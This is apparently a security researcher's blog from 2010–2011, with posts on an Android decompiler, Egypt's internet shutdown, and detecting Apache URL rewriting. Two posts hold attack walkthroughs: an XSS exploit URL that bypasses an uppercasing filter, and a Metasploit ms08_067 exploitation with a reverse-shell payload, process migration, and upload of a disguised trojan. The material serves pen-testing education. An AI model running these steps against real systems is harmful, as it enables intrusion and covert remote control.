cruft

Kivlad - Initial Thoughts

2011-07-06T15:33:00.003-04:00

Recently, the folks over at Matasano Security released a tool to decompile Android Dalvik binaries. The tool is named Kivlad and it can be found on their site.

Having a need to dissassemble Android binaries on a fairly frequent basis, I'm always looking for a new tool to help out, so I took this one for a spin.

The first thing to point out is the disclaimer on the Matasano site, which reads:

This is very much an alpha release and while it will be production-quality in the near future, we wanted to give the community a taste of what's to come.

Experimenting with Kivlad shows that disclaimer to be very warranted. Kivlad is a cool concept, and is somewhat unique in the field because the output format is HTML. At the core, Kivlad offers a tree view of the Android elements contained within the Dex. I like this idea, and it will be very cool to see it get developed further.

That said, the tool is pretty near non-functional (for me at least) - I'm unable to get it to parse any APK other than the included HelloWorld.apk that comes with the download.

Further, because the background of the HTML output is an image loaded via CSS, if the output file is not in the source code directory, it is completely unreadable (because the font color is set to white, and the default browser background is also white.) This is easily fixed, either open the file in the source code directory, or change the CSS to use whatever color scheme you wish.

I should note that I find both of these shortcoming to be perfectly acceptable, (Matasano did say the tool was pre-alpha afterall), and as I said, I like the concept and where this seems headed quite a lot.

The process to getting Kivlad working is pretty straightforward IMO, but I've included my notes here in case someone finds them useful. (These are for the Ubuntu Linux distribution, tested on versions 10.10 and 11.04)

Install the required software and libraries:

sudo apt-get install ruby1.9.1 libzip-ruby1.9.1 graphviz
sudo ln -s /usr/bin/ruby1.9.1 /usr/bin/ruby
sudo ln -s /usr/bin/gem1.9.1 usr/bin/gem
sudo gem install metasm

Download Kivlad and extract it:

wget http://www.matasano.com/research/kivlad/kivlad-0.1.tar.gz
tar zxf kivlad-0.1.tar.gz
cd kivlad-0.1

Run the tool:

ruby ./reflect.rb HelloWorld.apk HelloWorld.html

This will spit out a bunch of stuff, and you'll end up with a HelloWorld.html file in the directory:

Lcom/daeken/helloworld/HelloWorld;/
Succeed

Lcom/daeken/helloworld/HelloWorld;/bar
Succeed

...

Lcom/daeken/helloworld/R$string;/
Succeed

Lcom/daeken/helloworld/R;/
Succeed
[]

As I mentioned, the only APK I've been able to successfully use Kivlad on is the HelloWorld.apk. Every other APK I've tried has resulted in the following error (example below using OI_Safe_1.2.4 from freewarelovers.com):

ruby ./reflect.rb OI_Safe_1.2.4.apk OI_Safe_1.2.4.html

Lestreamj/ciphers/trivium/Trivium$Maker;/
Succeed

Lestreamj/ciphers/trivium/Trivium$Maker;/create
/home/rossja/Desktop/kivlad-0.1/instruction_form.rb:11:in `inspect': wrong number of arguments(1 for 0) (ArgumentError)
 from /home/rossja/Desktop/kivlad-0.1/instruction_form.rb:11:in `convert_insn'
 from /home/rossja/Desktop/kivlad-0.1/decompiler.rb:61:in `disassemble_all'
 from /home/rossja/Desktop/kivlad-0.1/decompiler.rb:85:in `disassemble_blocks'
 from /home/rossja/Desktop/kivlad-0.1/decompiler.rb:713:in `decompile'
 from /home/rossja/Desktop/kivlad-0.1/decompiler.rb:774:in `decompile'
 from /home/rossja/Desktop/kivlad-0.1/dex.rb:70:in `method'
 from /home/rossja/Desktop/kivlad-0.1/dex.rb:46:in `block (2 levels) in initialize'
 from /home/rossja/Desktop/kivlad-0.1/dex.rb:45:in `map'
 from /home/rossja/Desktop/kivlad-0.1/dex.rb:45:in `block in initialize'
 from /home/rossja/Desktop/kivlad-0.1/dex.rb:30:in `map'
 from /home/rossja/Desktop/kivlad-0.1/dex.rb:30:in `initialize'
 from ./reflect.rb:9:in `new'
 from ./reflect.rb:9:in `initialize'
 from ./reflect.rb:21:in `new'
 from ./reflect.rb:21:in `'

At some point I'll try to chase down where the issue is and see if I can figure out whom to send a patch to =)

welcome back to the net, Egypt

2011-02-02T20:51:00.002-05:00

On January 27, 2011, the country of Egypt disabled the Internet for anyone within its borders. It did this in a couple of ways, both via the network (at the BGP level), as well as the name resolution (DNS) level. This means the take down not only impacted Egyptian nationals, but citizens of other countries that happened to be in Egypt during this time period, as well as anyone that was using a .eg ccTLD domain.

original source

I don't have a lot of time to form a well crafted post on the topic of Internet blockade at a national level - it suffices to say that I'm opposed.

Here are a couple of very interesting graphs, taken from http://stat.ripe.net/egypt

Start of the BGP withdrawal:

Re-announcement of Egyption BGP routes:

I'm glad that Egypt has decided to allow all those impacted by this outage access to the Internet once more. Welcome back .eg.

Detecting URL Rewriting (part 2)

2010-10-08T02:02:00.009-04:00

This post is a continuation of my documenting the process I go through to come up with some way a client of a web site can first: determine if URL rewriting is occurring on a given web server, and second: in cases where it is used, determine what the rewrite rules are.

I left off with Apache configured, and a simple rule established for mod_rewrite. I now need to decide whether to use mod_rewrite to handle the rewrite using a redirect (via an HTTP 302 response), or to process it internally. As I mentioned, the difference between these two methods is quite large.

For example, if I choose to send a redirect, (eg. by amending our rule to include an [R] flag), like so ...

RewriteRule    /litterbox/(.*)  /sandbox/$1 [R]

... the rewrite rule will cause an incoming request to http://bar.com/litterbox/bar1.php to be redirected to the location http://bar.com/sandbox/bar1.php instead by using HTTP server headers.

Examining the relevant portion of the HTTP request and response headers associated with this process, the conversation looks like this:

Initial request:

GET /litterbox/bar1.php HTTP/1.1
Host: bar.com

Initial response:

HTTP/1.1 302 Found
Date: Wed, 06 Oct 2010 04:50:18 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
Location: http://bar.com/sandbox/bar1.php

In the response above, notice that the server has returned an HTTP 302 status response, and included a Location: header which contains the URL to the content. The browser receives this, and sends a new request to that location:

Redirected request:

GET /sandbox/bar1.php HTTP/1.1
Host: bar.com

This request is met with the final response, which includes the content at /sandbox/bar1.php:

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 04:50:29 GMT

This is how I've used mod_rewrite in the past. The rules I've set to enforce SSL have been very similar to the one given in the example. At first glance, it seems that it will be easy to tell when rewriting is occurring... all that's required is to look for the 302 response!

Not so fast

There are a couple problems with this theory. The first is: there are other mechanisms which can be used to provide this same HTTP response code. For example, the following PHP code will cause an HTTP 302 response to be sent by the server:

<?php
header("Location: http://bar.com/sandbox/bar1.php");
?>

When I put that code into a file located at http://bar.com/redir.php, the response to a GET request for that file looks pretty much exactly like the one generated natively by Apache above:

HTTP/1.1 302 Found
Date: Wed, 06 Oct 2010 05:38:09 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Location: http://bar.com/sandbox/bar1.php

From this, it would seem that there is no way to distinguish between a redirect coming from mod_rewrite, and one stemming from some other mechanism.

More importantly though, and a bigger blow to my high hopes for an easy answer, is that the [R] flag is optional. By default, a redirect header isn't returned by Apache at all when mod_rewrite is used. Looking up how Apache handles rewriting, there's a fair amount of documentation on the process specific to the 2.2 version of Apache I'm using:

The nutshell version is this: Requests which are rewritten and not using a 302 response to the client are processed completely within the Apache Kernel only. There's no indication given to the client that a redirect has occurred.

In fact, it appears that the only way an application hosted on the server can know that it has been reached via a rewritten request is by checking for the presence of one or both of two server headers which only appear when Apache has processed a rewrite ... they do not appear on a redirect, despite their name =)

(Recall that I can see these because the PHP script I wrote includes a printout of every server header. It seems that doing this was a good idea indeed!):

REDIRECT_STATUS = 200
REDIRECT_URL = /litterbox/bar1.php

Note that these headers are different than the ones the Apache documentation says it adds. I'm not sure why that is, but since these headers are only available as server variables, they are completely outside the reach of a client accessing a given URL on the host.

That sucks.

At this point, I give up on the 302 response and Location: header theory: it's both misleading (in that a 302 response may not be the result of a URL rewrite), and inconsistent in that rewritten URLs may not provide a 302 response at all.

I start thinking of other mechanisms I could use. One that comes immediately to mind is the Referer header. This is an HTTP header which is provided to a web server when, for example, a user clicks a link. The destination host the link resolves to receives the request for a URL, along with where the user came from. An example of this can be seen here:

Initial Request:

GET /litterbox/bar1.php HTTP/1.1
Host: bar.com

Initial Response:

HTTP/1.1 200 OK
Date: Fri, 08 Oct 2010 05:51:54 GMT
[content]
  <div><a href="bar2.php">bar2</div>
[more-content]

The content served in the response contains a link to bar2.php. When I click that link, the fact that I'm coming from the bar1.php page is sent in the request, as shown below:
Request to bar2.php:

GET /sandbox/bar2.php HTTP/1.1
Host: bar.com
Referer: http://bar.com/litterbox/bar1.php

That's all well and good, but as you can see, the Referer still shows /litterbox as the URL I was coming from. That's because the referer is specified by the user agent (a browser in this case). Since the browser didn't receive any indication that the content it is being served has come from a different location than it requested, it thinks it's still at /litterbox and so sends that location in the headers.

So much for using that as a detection of rewriting. What's next...
So far, I've tried a couple of different ideas to try to determine if a client can tell whether URL rewriting is in use or not. I've ruled out using a 302 response and accompanying Location: header as being unfit for this purpose. I've also briefly played with the idea of using Referer, and quickly ruled that out as an option as well. I need to come up with some more creative way to try to tell.

How about timing?

Thinking about this problem a bit, it occurs to me that, since the Apache kernel has to map rewritten URLs internally to come up with a computed URL to serve content from, that I may be able to use how long a request takes to load as an indicator.

To test this theory out, I'm going to use ruby, because I'm familiar with it, and it allows me to quickly throw together some proof-of-concept code.

Since I have the advantage in this case of knowing for sure what is being rewritten and what is not, I can use the benchmark module in ruby to measure the time it takes to get a file where rewriting is occurring, and where it is not. I can then compare the two to see if this theory bears further investigation.

For the intital test, I decide to use the bmbm method of the benchmark module for two reasons: 1) it automatically gives me two iterations to compare. But more importantly it 2) initializes the environment and tries to minimize skewed results by going through a rehearsal process before benchmarking "for reals". Once I decided that, I came up with the following script:

#!/usr/bin/env ruby
require 'net/http'
require 'uri'
require 'benchmark'
include Benchmark

bmbm do |test|
  test.report("rewrite:") do
    Net::HTTP.get_response URI.parse('http://bar.com/litterbox/bar1.php')
  end
  test.report("non-rewrite:") do
    Net::HTTP.get_response URI.parse('http://bar.com/sandbox/bar1.php')
  end
end

I've created two labels in this benchmark: one for the known rewritten URL, and one for the known non-rewritten URL. When I run this script, I get the following results:

Rehearsal ------------------------------------------------
rewrite:       0.010000   0.000000   0.010000 (  0.001429)
non-rewrite:   0.000000   0.000000   0.000000 (  0.000876)
--------------------------------------- total: 0.010000sec

                   user     system      total        real
rewrite:       0.000000   0.000000   0.000000 (  0.001105)
non-rewrite:   0.000000   0.000000   0.000000 (  0.000907)

That's pretty interesting! When I run this on the same host the web server is located at, I can definitely tell a difference between rewritten and non-rewritten content!

I need to look into this further. The first thing that needs to happen is, I need to perform these requests many more times and look at the timing. A single request is useful for a quick "is there merit to this", but the fact that it appears this may work could just be a fluke in the given requests at that particular time. I need to increase the number of times I perform this test and prove whether, statistically, there is a difference in the time it takes to serve a rewritten URL vs a non-rewritten one.

I also need to look at what factors may affect the results. Some immediate considerations that come to mind are:

is the Apache server cacheing content, causing it to be served faster the second time?
Am I able to prevent that if so?
On a local machine, this may work, but what happens across a LAN?
What happens to the timing when requests go across the Internet?
How much does "heavy" content (video, images, etc.) affect the timing?
Can I time just getting the HTTP headers, to avoid loading content?

I need to answer some of these before testing, and some of these will be answered as the testing progresses.

[to be continued]

Detecting URL Rewriting (part 1)

2010-10-01T03:25:00.017-04:00

[edit 2010-10-02]: i realized after replying to cdman's comment that i had neglected to include the goals of this project in this post, but had included them in this one instead. I've edited the beginning here to include the first part of that post.

As I mentioned earlier: I’ve been pondering URL rewriting for the past couple of days - trying to come up with some way a client of a web site can first: determine if URL rewriting is occurring on a given web server, and second: in cases where it is used, determine what the rewrite rules are.

I started this process by doing some homework to learn more about how URL rewriting occurs. I’ve used Apache’s mod_rewrite in the past to accomplish some basic tasks like redirecting incoming http:// requests to their https:// counterpart to enforce SSL usage, but I had never done much beyond that.

I decided (as I often do) that the best way to learn was to play. To determine whether URL rewriting is in use, and to try to map the rules, means that I need to have a portion of a web site that is using URL rewriting, and one that is not (so I can compare the two). I further need to have some rewrite rules. Coming up with a random set of rules is difficult, so I gave myself what was, in my mind, a likely scenario:

The Bar, Inc. marketing dept. has realized that their ‘litterbox’ product line has a name which creates a negative impression. It’s decided that ‘sandbox’ is a much better brand for the products. Of course, with the rebranding, the web site has to be updated, it simply won’t do to have links going to bar.com/litterbox/ now that the name has changed.

Begrudgingly, the developers of the Bar, Inc. website put in a ton of overtime to change all the links in the code. Then someone realizes that all the Bar, Inc. customers and business partners also have links that are going to break. The developers can’t do anything about that, it’s outside their control. It now falls to the sysadmin to make sure that no critical third party links get broken.

As the sysadmin, my task is simple: take any requests for /litterbox/whatever and have them go to /sandbox/whatever instead.

Excellent! I now have an interesting story to keep me from getting bored. (OK, fine… interesting is subjective ;-)

More importantly, the fictitious set of requirements dictated in the scenario means that I have a framework established for how to approach setting up this research project.

That means it’s time to get to work.

Preparing The Environment

To get this set up in a way that meets the criteria of the scenario, I first need to have a website. I have a Linux box handy, so I decide to do my testing using Apache. The specific version and OS I’m using is Apache 2.2.9 on Debian Linux, with the Suhosin Patch. In other words, I’m using the default apache2 (mpm-prefork) package on Debian 'lenny'.

I create a directory named sandbox in the Apache web root (which is /var/www on Debian). I then create 4 files in that directory: bar1.php, bar2.php, bar3.php, and bar4.php. Next I edit each of these files to contain some generic code similar to the following, (changing the title and h1 tags to correspond to the file name):

<head>
<title>bar1</title>
</head>
<body>
<h1>bar1</h1>
<div><a href="bar1.php">bar1</div>
<div><a href="bar2.php">bar2</div>
<div><a href="bar3.php">bar3</div>
<div><a href="bar4.php">bar4</div>
<hr />
<?php
foreach($_SERVER as $key_name => $key_value) {
print $key_name . " = " . $key_value . "<br>";
}
?>
</body>
</html>

The PHP code in these files simply spits out the HTTP Server headers key/value pairs to the page. This may prove useful to review, so I'm including it in each page.

Now that I have the Bar, Inc. "website" in place it’s time to contemplate how to proceed – I have at least ~~three~~ four options:
Edit 2010-10-04: I'd neglected to consider the Apache Alias directive. I've added that to the list.

I can enable the SymLinks option and create a link from litterbox to sandbox.
I can use mod_rewrite to change requests for litterbox to sandbox.
I can use mod_rewrite to send an HTTP 302 response redirecting requests to the new location.
I can use the Apache Alias directive to redirect requests to litterbox to a specific path on the file system

After considering these for a bit, I decide that leaving a bunch of stale links lying around the directory tree is a BadThing. For similar reasons, I decide not to use the Alias directive, so that future sysadmins don't become confused. Accordingly, I select mod_rewrite as the way to go. (Thankfully, since that’s the whole point of this project ;-)

Setting up mod_rewrite

The first thing I need is for the mod_rewrite module to be loaded in the Apache configuration. How this occurs varies based on the installation of Apache. In Debian it’s extremely simple to accomplish this task, a single command (and later, a reload of the Apache server) will suffice:

# a2enmod rewrite

Now that the module is enabled, I need to define some rules. This can be done by editing the configuration file that defines the web site. In Debian, this means editing the file /etc/apache2/sites-available/<site-name>. Because I’m just using the default configuration, I place my changes in /etc/apache2/sites-available/default.

The syntax for mod_rewrite can be quite complex, and there are some very powerful features that it provides. However, the scenario I set for myself dictates what I need to establish as far as the rewrite rules… that is, I need to change "litterbox" to "sandbox". Configuring this in Apache is easy enough, it looks like this:

RewriteEngine on
RewriteRule    /litterbox/(.*)  /sandbox/$1

The first line turns on the RewriteEngine. The second one establishes that I want to replace any instance of "/litterbox/" followed by one or more characters, with "/sandbox/" followed by whatever other characters were present when the request came in.

That single line should accomplish the goal of my scenario, however I still have one choice left to make: I need to decide whether I should use mod_rewrite to accomplish this task via an HTTP redirect, or to rewrite the requests.

The difference between these two is not trivial.
Before I go any further, I need to gain a better understanding of how URL rewriting works in Apache.

[to be continued]

on security research

2010-10-01T02:49:00.008-04:00

I’ve been pondering URL rewriting for the past couple of days - trying to come up with some way a client of a web site can first: determine if URL rewriting is occurring on a given web server, and second: in cases where it is used, determine what the rewrite rules are.
As I have been thinking about this, it occurred to me that, despite the proliferation of security research whitepapers and blog posts, there is a scarcity of ‘this is the process I went through to do this research’ information out there.

There are mountains of articles and documents, with dizzying arrays of statistics and metrics (often intermingled with a fair amount of marketing fluff), and yet most of the whitepapers, and certainly the various conference presentations, simply don’t talk about the process - preferring instead to present the end results.
As security professionals, we gather together at a multitude of conferences where we do a wonderful job displaying all of this shiny data and showing off new marvelous tricks to each other with varying degrees of self-indulgence. Yet most of how we came to have such cool stuff is left out of the picture entirely.

I understand why that is, of course. Simply put, the process is boring! It’s full of failure, and repeatedly throwing things at a wall and observing what happens. Nobody wants to sit in a small room with a couple hundred hackers listening to someone drone on for an hour about how “this didn’t work…and neither did this”, I get that. Added to that is the fact that, in some cases, the research is being done for a corporate (or government) entity. In such a situation, the process may be withheld not from a lack of desire to share on the researcher’s part, but because they are not permitted to do so by the organization for which the work was done.

Despite these reasons, in my opinion it is a disservice to ourselves, to the profession, and to others whom may be interested in performing their own research, when we all we do is deliver an end product in glossy PDF or a shiny PowerPoint presentation. That is simply not research, it’s promotion. Research, in an academic sense, implies documenting the entire process: both success and failure. This is not what I find when I look at the typical infosec industry output.

Accordingly, I’ve decided that I will share how I go about this particular project, and not just release some PDF or tool as a result of it. I’ll post my process here, any notes and thoughts, as well as any code I come up with. (Well, links to code anyway. I’ll probably keep the code itself in github).

One of the reasons I’m doing this is that I expect to fail. =)

As I’ve considered how one can detect URL rewriting, and as I’ve started investigating the details of how it works, my initial thought is that detecting it simply won’t be possible.

If that’s correct, I think it’s important that I present what I tried, along with the fact that ultimately it didn’t work. That’s vital information, in that it prevents someone else from wasting cycles repeating a process that’s already been done.

As well, understanding why something failed may lead to discovering a way to succeed.

OK… this rant being done now, my next post will start the process of documenting my research into detecting URL rewriting.

thinking sideways

2010-05-27T23:31:00.009-04:00

Had an interesting question posed to me today. A web application was using portions of the GET request to create content on a page, and not properly sanitising the input. The result was a web page that was potentially vulnerable to cross-site scripting (XSS). However, there was a catch. The application, while not checking for security risks, was converting the GET request parameters to all uppercase.

This meant that, since javascript is case sensitive, the usual methods wouldn't work For example you couldn't use document.write(), or alert(), because they were rendered as DOCUMENT.WRITE() or ALERT() instead.

Here's a quick and dirty PHP script I wrote that mimics this behaviour (note that you will need to have GPC_MAGIC_QUOTES turned off in the php.ini for this to work)

<?php
   echo '<form name="testform" method="post">';
   echo '<select name="test">';
   if (isset($_GET['options']) ) {
      echo strtoupper($_GET['options']);
   } else {
      echo '<option value="empty">EMPTY</option>';
   }
   echo '</select>';
   echo '<input type="submit" name="submit" value="submit" />';
   echo '</form>';
?>

To test it out, simply browse to http://yourhost.yourdomain/test.php?options=uppercaseftw

So, the question as a pen tester is, how can I break this?

Turns out the answer is pretty simple: you simply make your own javascript file, host it on a server somewhere, give it an uppercase file name, and create functions with uppercase names.

For example, I created the following XSS() function, in a file named XSS.JS:

function XSS() {
   alert('xss'); // or whatever
}

Now, I need to load this code into the page I'm requesting, and then somehow call the XSS() function. I did this by closing the select tag in my options GET parameter, and providing my own script tag. I then created a link to "foo", and set an onMouseOver event to call the XSS() function.

Here's what the request URL looks like to exploit this code:

http://localhost/sandbox/index.php?options=<option value="number1">number1</option></select><script language="javascript" src="XSS.JS"></script><a href="foo" onmouseover="XSS()">clicky</a>   <!--

The result is a nice link that, upon placing the mouse over it, triggers the javascript event which fires off the usual alert box.

The source code of the resulting page looks like this:

<form name="testform" method="post">
<select name="test">
<OPTION VALUE="NUMBER1">NUMBER1</OPTION>
</SELECT>
<SCRIPT LANGUAGE="JAVASCRIPT" SRC="XSS.JS"></SCRIPT>
<A HREF="FOO" ONMOUSEOVER="XSS()">CLICKY</A>   
<!--</select>
<input type="submit" name="submit" value="submit" />
</form>

Nothing particularly awesome about this, but it was a situation I'd not come across before, and it took me a minute to figure out a way around it. So I thought I'd share =)

on pen testing and fireworks

2010-05-03T18:54:00.003-04:00

eEye posted a blog entry recently that attempted to compare providing free tools for pen testing to encouraging someone to use fireworks. This post from eEye is actually part of a growing pattern of 'pen test/full disclosure == criminal' BS being tossed around by various companies (notably, each of which perform vulnerability assessments themselves), but I don't have time to fully address my thoughts on that at the moment (hint: there's another post coming later on this topic).

Specifically, eEye's post makes the following statements:

Penetration tools clearly allow the breaking and entering of systems to prove that vulnerabilities are real, but clearly could be used maliciously to break the law.

Making these tools readily available is like encouraging people to play with fireworks. Too bold of a statement? I think not. Fireworks can make a spectacular show, but they can also be abused and cause serious damage. In most states, only people licensed and trained are permitted to set off fireworks.

This analogy is flawed for a number of reasons, not least of which is the fact that the statement that most states disallow fireworks to people other than licensed pyrotechnicians is untrue.

I made a comment to their site about this, but as it has not been approved yet, I'm posting my comment here as well.

Here's my two bits:

Since you relate the use of free pen test tools to fireworks as an argument, it should probably be pointed out that the majority of states in the US permit consumer fireworks, and only a very few disallow them. See: http://www.cpsc.gov/cpscpub/pubs/012.html

Perhaps the free pen test tools are “consumer grade” vs. the commercially licensed products that, to follow your analogy, should apparently only be used by licensed professionals (though frankly, I know folks in #metasploit that I trust with these tools more than many CISSPs that I know…)

Either way, I’m glad these tools are available, and free, and I am as grateful that I can use them as I am for the fond memories I have of lighting off fireworks with my family as a child. There’s something about being out in the field and participating that makes the moment much more enjoyable than simply watching someone else do it for you.

*update*
eEye has since replaced the entirety of the original post with one that essentially states "ummm... we meant that using free pen testing tools without permission is bad". *sigh*.

Even When You Know You're Pwnd, It's Hard To See

2010-03-25T12:57:00.004-04:00

I'm playing around with a RAT showdown for a project I'm working on (teaser: It will be a comparison of SharK 3.1, Poison Ivy 2.3.2, and the GPL version of Immunity Inc's Hydrogen).

While doing this, it really hit home how tough it is to tell a host has been owned if it's being done right.

I know this anyway, having been on the incident response side of things for a number of years, so it's not news really. It's just that every now and then something springs back up from memory and smacks you clear across the face and screams "Oh Yeah!" in a Randy "Macho Man" Savage impression. This was one of those moments for me.

Let me give an example. I'll do that, by combining it with a "how to use the metasploit framework to upload binaries" overview first.

So, step 1 is: get MSF3, and run the msfconsole. I'm going to skip that step here, and jump straight to setting the payload we want (meterpreter), and exploiting.

First, set the payload:

 msf > setg payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

Now pick everyone's favorite exploit: ms08_067_netapi

 msf > use exploit/windows/smb/ms08_067_netapi

Let's take a look at the options:

msf exploit(ms08_067_netapi) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LHOST     10.0.1.51        yes       The local address
   LPORT     4444             yes       The local port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

Some of these were set for me via my msfconsole.rc file (specifically, the LHOST setting for the payload.)
Now I pick the target I'll be exploiting, and set it with the RHOST option:

msf exploit(ms08_067_netapi) > set RHOST 10.0.1.71
RHOST => 10.0.1.71

Once that's all set, I can exploit the host:

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 10.0.1.51:4444 
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (10.0.1.51:4444 -> 10.0.1.71:1082)

BAM! I have a meterpreter session (ms08_067 isn't called 'old faithful' for nothing.)

OK. Pentest done. Next B0x!

Unfortunately, that's too often the case. This is sad really, because there's so much more I can do with this. Like the following ;-)

Let me start by finding out some information about the session, what privs I have on the host, and what process I'm running under:

 meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > getpid
Current pid: 1108

meterpreter > ps

Process list
============

 PID   Name              Arch  Session  User                          Path
 ---   ----              ----  -------  ----                          ----
 0     [System Process]                                               
 4     System            x86   0        NT AUTHORITY\SYSTEM           
 632   smss.exe          x86   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 680   csrss.exe         x86   0        NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\csrss.exe
 704   winlogon.exe      x86   0        NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\winlogon.exe
 748   services.exe      x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\services.exe
 764   lsass.exe         x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\lsass.exe
 940   svchost.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\svchost.exe
 988   svchost.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
 1108  svchost.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
 1184  svchost.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
 1280  svchost.exe       x86   0        NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\system32\svchost.exe
 1448  spoolsv.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\spoolsv.exe
 1704  explorer.exe      x86   0        VIKTIM2\viktim                C:\WINDOWS\Explorer.EXE
 1860  msdtc.exe         x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\msdtc.exe
 352   mqsvc.exe         x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\mqsvc.exe
 832   mqtgsvc.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\mqtgsvc.exe
 768   alg.exe           x86   0        NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\System32\alg.exe
 4032  sqlservr.exe      x86   0        NT AUTHORITY\NETWORK SERVICE  c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
 4052  inetinfo.exe      x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\inetsrv\inetinfo.exe
 4044  dllhost.exe       x86   0        VIKTIM2\IWAM_VIKTIM2          C:\WINDOWS\system32\dllhost.exe
 3692  dllhost.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\dllhost.exe
 3896  IEXPLORE.EXE      x86   0        NT AUTHORITY\SYSTEM           C:\Program Files\Internet Explorer\IEXPLORE.EXE

Pretty cool. As expected, I'm running as the local system, and have attached to the svchost.exe process (pid# 1108).

If I look at the current working directory for the session, I see it's the Windows system32 directory:

meterpreter > pwd
C:\WINDOWS\system32

That's all very cool, but for this example, I want to interact with a user session.
Looking at the process list, I see that there's a 'viktim' user logged in and that user is running explorer.exe in process 1704.

I'm going to try to switch to that process, using the handy migrate function provided by metasploit:

meterpreter > migrate 1704
[*] Migrating to 1704...
[*] Migration completed successfully.

meterpreter > getuid
Server username: VIKTIM2\viktim

Excellent. I've now switched to a process running in the context of my target user.
Let me take a look at what my current directory is now:

meterpreter > pwd
C:\Documents and Settings\viktim

What I want to do now is to upload my malware to the host.
In this case, I'll be uploading a remote access trojan I built using sharK.
I've named the executable msdce32.exe in a sad attempt to be sneaky ;-)
To upload the file to the victim host, I use the upload function in meterpreter:

 meterpreter > upload msdce32.exe
[*] uploading  : msdce32.exe -> msdce32.exe
[*] uploaded   : msdce32.exe -> msdce32.exe

Looks like the file upload was successful, so I try running it using the execute command.
This command takes a -f parameter with the filename to execute:

meterpreter > execute -f msdce32.exe
Process 292 created.

Very nice. Looking at my sharK console, I see that the process worked, because my victim has now connected to my SIN and I am able to use sharK to interact with it. (That will be a different post entirely, but here's a screenshot of what it looks like. Note that the XP Desktop in the image below is actually a screen capture of the victim host that sharK provides when you mouseover the connection in the SIN):

Since I'm done exploiting my victim user, let me return back to the host and go back to a system process using the getsystem method in meterpreter:

meterpreter > getsystem
...got system (via technique 1).

Since I'm back at system, let me see if I can see my trojan running:

meterpreter > ps

Process list
============

 PID   Name              Arch  Session  User                          Path
 ---   ----              ----  -------  ----                          ----
 0     [System Process]                                               
 4     System            x86   0        NT AUTHORITY\SYSTEM           
 632   smss.exe          x86   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 680   csrss.exe         x86   0        NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\csrss.exe
 704   winlogon.exe      x86   0        NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\winlogon.exe
 748   services.exe      x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\services.exe
 764   lsass.exe         x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\lsass.exe
 940   svchost.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\svchost.exe
 988   svchost.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
 1108  svchost.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
 1184  svchost.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
 1280  svchost.exe       x86   0        NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\system32\svchost.exe
 1448  spoolsv.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\spoolsv.exe
 1704  explorer.exe      x86   0        VIKTIM2\viktim                C:\WINDOWS\Explorer.EXE
 1860  msdtc.exe         x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\msdtc.exe
 352   mqsvc.exe         x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\mqsvc.exe
 832   mqtgsvc.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\mqtgsvc.exe
 768   alg.exe           x86   0        NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\System32\alg.exe
 4032  sqlservr.exe      x86   0        NT AUTHORITY\NETWORK SERVICE  c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
 4052  inetinfo.exe      x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\inetsrv\inetinfo.exe
 4044  dllhost.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\dllhost.exe
 3692  dllhost.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\dllhost.exe
